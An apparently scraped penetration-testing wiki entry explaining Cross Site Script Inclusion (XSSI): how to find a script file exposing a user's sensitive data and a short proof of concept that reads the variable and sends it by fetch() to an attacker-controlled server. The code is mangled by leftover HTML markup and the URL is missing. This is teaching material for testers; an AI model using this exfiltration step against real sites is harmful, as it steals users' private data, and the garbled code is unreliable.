Cobalt Crowdsourced Application PentestCobalt Crowdsourced Application PentestCobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki

V5 - Validation/Sanitization

Cross Site Script Inclusion (XSSI)


Try to find a JS file which includes sensitive information of the user Look at the HTTP GET request for the JS file to make sure that it doesn’t require CORS triggering headers like: Authorization, X-API-KEY, X-CSRF-TOKEN, X-whatever If it does have CORS headers then, the attack will fail, unless you find a CORS issue. Use the following PoC to exploit // var<em>name is a variable in vuln.js holding sensitive information console.log(var</em>name); // sending information to an attacker controlled server fetch(&quot;;+var_name);